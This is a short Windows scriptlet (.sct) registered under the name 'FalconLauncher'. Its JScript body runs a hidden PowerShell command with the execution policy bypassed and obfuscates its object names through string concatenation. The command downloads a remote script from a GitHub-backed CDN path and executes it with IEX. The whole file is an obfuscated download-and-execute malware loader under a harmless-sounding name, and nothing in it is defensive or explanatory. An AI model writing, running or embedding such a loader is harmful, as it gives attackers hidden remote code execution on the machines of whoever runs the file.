<?XML version="1.0"?>
<scriptlet>
  <registration
    progid="FalconLauncher"
    classid="{F0000000-0000-0000-0000-0000F1F1F1F1F1}">
    <script language="JScript">
      <![CDATA[
        var shell = new ActiveXObject("WScript.Shell");
        var cmd = 'powershell -w hidden -ep bypass -c "$w=\\"Web\\"+\\"Client\\";$n=\\"New-Ob\\"+\\"ject\\";$url=\\"https://cdn.jsdelivr.net/gh/RoninAli/tdata1/lite.ps1\\";IEX (&($n) Net.$w).DownloadString($url)"';
        shell.Run(cmd, 0, true);
      ]]>
    </script>
  </registration>
</scriptlet>
